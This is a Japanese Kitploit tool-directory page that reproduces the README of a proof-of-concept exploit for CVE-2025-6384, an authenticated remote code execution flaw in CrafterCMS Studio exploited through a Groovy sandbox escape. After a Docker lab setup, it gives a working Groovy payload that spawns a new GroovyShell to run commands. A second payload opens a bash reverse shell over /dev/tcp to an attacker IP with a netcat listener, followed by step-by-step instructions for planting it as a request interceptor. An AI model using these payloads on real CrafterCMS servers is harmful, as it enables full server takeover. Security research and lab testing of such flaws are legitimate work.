Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CrafterCMS-CVE-2025-6384 — Groovyサンドボックスバイパスを介したCrafterCMSの認証済みRCEのPoCエクスプロイト(CVE-2025-6384) | Kitploit
ツール/GitHubGitHub/maestro-ant/craftercms-cve-2025-6384
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHubmaestro-ant/craftercms-cve-2025-6384

CrafterCMS-CVE-2025-6384

Groovyサンドボックスバイパスを介したCrafterCMSの認証済みRCEのPoCエクスプロイト(CVE-2025-6384)

リポジトリを見る
411ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CrafterCMS 認証済み RCE - Groovy サンドボックス回避 (CVE-2025-6384)

CrafterCMS における認証済みリモートコード実行 (RCE) 脆弱性の Proof of Concept です。

脆弱性の概要

開発者権限を持つ認証済みユーザーは、Crafter Studio の Groovy スクリプトサンドボックスを回避して、リモートコード実行 (RCE) を達成できます。サンドボックスは新しい GroovyShell のインスタンス化をブロックできないため、これを使用して制限のない新しい実行環境を作成できます。

  • 製品: CrafterCMS
  • コンポーネント: Crafter Studio
  • 脆弱性: Groovy サンドボックス回避による認証済み RCE (CWE-913)
  • 影響: サーバー全体の完全な侵害

ラボのセットアップ / デプロイ

公式の Docker Compose ファイルを使用して、テスト用に脆弱な CrafterCMS インスタンスをすばやくデプロイできます。

  1. CrafterCMS から docker-compose リポジトリをクローンします:

    root@kitploit:~
    git clone https://github.com/craftercms/docker-compose.git
    
  2. オーサリング環境ディレクトリに移動します:

    root@kitploit:~
    cd docker-compose/authoring
    
  • コンテナを起動します。これにより必要なイメージがダウンロードされ、CrafterCMS スタックが起動します。

    root@kitploit:~
    docker-compose up
    

    (sudo が Docker のインストール状況によっては必要になる場合があります。)

  • サービスが完全に初期化されるまで待ちます。Crafter Studio には http://localhost:8080/studio でアクセスできます。

    • デフォルトユーザー名: admin
    • デフォルトパスワード: admin
  • 概念実証 (PoC)

    サンドボックスは直接の実行メソッドを正しくブロックしますが、次のペイロードは許可されます。これにより、サンドボックス化されていない新しい Groovy シェルが作成されます。

    root@kitploit:~
    // File: /scripts/interceptors/pwn.groovy
    
    def shell = new GroovyShell()
    def command = "id" // <-- Your command here
    def result = shell.evaluate("'''${command}'''.execute().text")
    
    // The output is printed to the server logs
    System.err.println("[RCE-PoC] " + result)
    

    RCE エクスプロイト: リバースシェル

    このペイロードは、攻撃者が制御するマシンへのリバースシェルを確立することで、完全な RCE を実証します。

    1. リスナーを起動する

    自分のマシンで、受信接続を受け取るリスナーを起動します (例: netcat を使用):

    root@kitploit:~
    nc -lvnp 4444
    

    2. ペイロードを準備する

    次の Groovy スクリプトをペイロードとして使用します。リスナーの IP アドレスとポートに <YOUR_IP> と <YOUR_PORT> を置き換えることを忘れないでください。

    root@kitploit:~
    // File: /scripts/interceptors/exploit.groovy
    
    def attacker_ip = "<YOUR_IP>"
    def attacker_port = "4444" // Or <YOUR_PORT>
    
    def cmd = "bash -i >& /dev/tcp/" + attacker_ip + "/" + attacker_port + " 0>&1"
    def shell = new GroovyShell()
    
    // Use triple quotes to handle the command string easily
    shell.evaluate("""
        new ProcessBuilder("/bin/bash", "-c", "${cmd}").start()
    """)
    
    System.err.println("Reverse shell payload executed.")
    

    再現手順

    1. デフォルトの認証情報 (admin / admin) で Crafter Studio (http://localhost:8080/studio) にログインします。

    2. Site Config -> Scripts に移動します。

    3. 「Groovy Scripts」セクションの Create/Edit Script をクリックします。

      画像
    4. 実行されるスクリプトタイプ (例: Request Interceptor) を選択します。

    5. PoC ペイロードをスクリプトエディタに貼り付けて保存します。

      画像
    6. Web サイトの任意のページ (例: http://localhost:8080) にアクセスしてスクリプトをトリガーします。

    7. サーバーの標準エラーログを確認して、コマンドの出力を確認します。

      • PoC の場合、コンテナ ID を見つけ、そのログでコマンド出力を確認します:
      root@kitploit:~
      docker-compose logs -f crafter
      

      期待される出力:

      root@kitploit:~
      GroovyShell: uid=1000(crafter) gid=1000(crafter) groups=1000(crafter)
      
      画像
      • リバースシェル の場合、netcat リスナーを確認します。コンテナからのシェルセッションが届いているはずです。 画像

    免責事項

    この資料は教育および研究目的のみで提供されています。著者は、この情報によって引き起こされた不正使用や損害について一切の責任を負いません。

    ツールをダウンロード